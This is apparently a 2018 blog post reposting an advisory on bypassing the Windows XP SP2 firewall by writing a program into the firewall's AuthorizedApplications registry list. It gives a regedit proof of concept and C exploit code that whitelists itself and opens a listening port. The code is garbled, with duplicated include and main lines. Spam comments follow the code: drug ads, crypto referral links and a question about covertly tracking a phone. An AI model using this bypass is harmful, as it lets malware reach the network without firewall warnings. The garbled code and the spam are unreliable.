Dec 8, 2018
There is a technique using which we can bypass windows-xp service pack-2 firewall.
This techniques is nothing but the vulnerability found in windows-xp sp2 firewall.
This is explained here in detail with exploit code.
Windows XP Firewall Bypassing (Registry Based) :- Microsoft Windows XP SP2 comes bundled with a Firewall. Direct access to Firewall’s registry keys allow local attackers to bypass the Firewall blocking list and allow malicious program to connect the network.
Credit :-
The information has been provided by Mark Kica.
The original article can be found at: http://taekwondo-itf.szm.sk/bugg.zip
Vulnerable Systems :-
* Microsoft Windows XP SP2
Windows XP SP2 Firewall has list of allowed program in registry which are not properly protected from modification by a malicious local attacker.
If an attacker adds a new key to the registry address of HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ SharedAccess\Parameters\FirewallPolicy\StandardProfile\ AuthorizedApplications\List, the attacker can enable his malware or Trojan to connect to the Internet without the Firewall triggering a warning.
Proof of Concept :-
Launch the regedit.exe program and access the keys found under the following path:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ SharedAccess\Parameters\FirewallPolicy\StandardProfile\ AuthorizedApplications\List
Add an entry key such as this one:
Name: C:\chat.exe
Value: C:\chat.exe:*:Enabled:chat
Exploit :-
#include <stdio.h>
#include <windows.h>
#include <ezsocket.h>
#include <conio.h>
#include “Shlwapi.h”int main( int argc, char *argv [] )
{
char buffer[1024];
char filename[1024];
#include <windows.h>
#include <ezsocket.h>
#include <conio.h>
#include “Shlwapi.h”int main( int argc, char *argv [] )
{
char buffer[1024];
char filename[1024];
HKEY hKey;
int i;
GetModuleFileName(NULL, filename, 1024);
strcpy(buffer, filename);
strcat(buffer, “:*:Enabled:”);
strcat(buffer, “bugg”);
RegOpenKeyEx(
HKEY_LOCAL_MACHINE,
“SYSTEM\\CurrentControlSet\\Services” “\\SharedAccess\\Parameters\\FirewallPolicy\\StandardProfile” “\\AuthorizedApplications\\List”,
0,
KEY_ALL_ACCESS,
&hKey);
RegSetValueEx(hKey, filename, 0, REG_SZ, buffer, strlen(buffer));
int temp, sockfd, new_fd, fd_size;
struct sockaddr_in remote_addr;
fprintf(stdout, “Simple server example with Anti SP2 firewall trick \n”);
fprintf(stdout, ” This is not trojan \n”);
fprintf(stdout, ” Opened port is :2001 \n”);
fprintf(stdout, “author:Mark Kica student of Technical University Kosice\n”);
fprintf(stdout, “Dedicated to Katka H. from Levoca \n”);
sleep(3);
if ((sockfd = ezsocket(NULL, NULL, 2001, SERVER)) == -1)
return 0;
for (; ; )
{
RegDeleteValue(hKey, filename);
fd_size = sizeof(struct sockaddr_in);
if ((new_fd = accept(sockfd, (struct sockaddr *)&remote_addr, &fd_size)) == -1)
{
perror(“accept”);
continue;
}
temp = send(new_fd, “Hello World\r\n”, strlen(“Hello World\r\n”), 0);
fprintf(stdout, “Sended: Hello World\r\n”);
temp = recv(new_fd, buffer, 1024, 0);
buffer[temp] = ‘\0’;
fprintf(stdout, “Recieved: %s\r\n”, buffer);
ezclose_socket(new_fd);
RegSetValueEx(hKey, filename, 0, REG_SZ, buffer, strlen(buffer));
if (!strcmp(buffer, “quit”))
break;
}
ezsocket_exit();
return 0;
}
/* EoF */
can you buy priligy online Silymarin Phytosome has been used in alternative medicine as a possibly effective aid in treating heartburn, or seasonal allergy symptoms
Your article helped me a lot, is there any more related content? Thanks! https://accounts.binance.com/sv/register?ref=OMM3XK51
Allison, USA 2022 04 23 01 36 12 cialis
jsvmp hello my website is jsvmp
mybellinhealth login hello my website is mybellinhealth login
Bat Trang hello my website is Bat Trang
prediksi dubai hello my website is prediksi dubai
lyrics Eminem hello my website is lyrics Eminem
untuk video hello my website is untuk video
premis mayor hello my website is premis mayor
japanese world hello my website is japanese world
pertandingan brazil hello my website is pertandingan brazil
Thank you very much for sharing, I learned a lot from your article. Very cool. Thanks. nimabi
¿Existe una mejor manera de localizar rápidamente un teléfono móvil sin que lo descubran?
Your article helped me a lot, is there any more related content? Thanks!
Wonderful analysis! Your insights are very enlightening. For those interested in further details, here’s a link: DISCOVER MORE. Keen to hear your views!
Your article helped me a lot, is there any more related content? Thanks! https://accounts.binance.com/pt-BR/register-person?ref=YY80CKRN